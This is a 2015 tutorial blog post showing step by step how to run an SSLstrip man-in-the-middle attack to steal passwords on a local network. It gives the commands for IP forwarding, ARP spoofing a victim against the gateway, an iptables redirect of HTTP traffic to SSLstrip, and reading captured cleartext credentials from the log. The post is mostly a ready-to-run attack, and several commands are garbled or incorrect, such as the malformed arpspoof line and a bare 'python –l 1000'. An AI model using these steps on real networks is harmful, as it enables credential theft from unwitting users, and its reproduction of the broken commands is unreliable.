Ready to Start Your Career?

Tutorial: Using SSLSTRIP in a "Man in the Middle" Attack

fr4nc1stein 's profile image

By: fr4nc1stein

June 23, 2015

Tutorial: Using SSLSTRIP in a "Man in the Middle" Attack - Cybrary

SSLSTRIP in a Man in the Middle Attack

 Hello guys,In this tutorial, I'm going to teach you how to use a SSLSTRIP via the Kali OS.We'll use SSLSTRIP for sniff or steal password in a Target PC via LAN (Local Area Network). SSLSTRIP is known in hijacking HTTP traffic on a network. For testing, we'll try to use VMWARE and download the Kali Operating System. I'm using BT5 (Backtrack) in my presentation. Requirements:1. Kali OS  - Click here2. Syntax Code from the Author of the SSLSTRIP3. Common sense We're assuming SSLSTRIP is already installed in Kali Operating system:Step 1: Open Terminal Step 2: In order to run SSLSTRIP in MITM, you need to know the Target IP and the IP of Gateway of the router. To find the router gateway IP, here's the code:route -nornetstat -nr Step 3: Port forward for accept packets and forward as vise versadisabled = 0enabled = 1Code: echo "1" > /proc/sys/net/ipv4/ip_forwardSee image below:image 1 Step 4: In a real attack, we'd be using ARPSPOOF against the layer 2 segments. In the images below, I modified the $routerip, but we make a simple instruction. At step 2, we find the router IP is To use ARSPOOF, follow this code.Code: arpspoof -i eth0 -t victimip routeripSee images below:image 2three 3Note: The $routerip was already modified in advanced tutorial. Don't follow the image - you can use this example:Code: arpspoof -t eth0 -t = victim ip192.168.109.2 =router ip or gateway Step 5: Modify the IP table. Let's understand iptables: iptables take traffic inbound to our Kali Linux machine, on which the destination is port 80 (also known as the HTTP web port. It redirects traffic to the port 1000, which is listening through the use of SSLSTRIP).Code: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000See image below:imahe 4 Step 6: Voila, peak time. We're going to open our SSLSTRIP.In Kali:Application -> kali linux -> information gathering ->sslstrip analysis - >sslstripIn BT:Application -> Backtrack -> Exploitation tools -> Web Exploitation Tools ->ssltripSee the image below:image 5Run the following to start the SSLSTRIP, which we set at port 1000.In Kali:Code: sslstrip -l 1000In BT:Code: python –l 1000 Step 7: An example of Victim login at image below:image 6 Step 8: Open the sslstrip.logSee image below:image 7The username and password is in cleartext - the blur portion in picture. Thank you!Regards from Philippine Security Researcher/fr4nc1stein/skyle17
Schedule Demo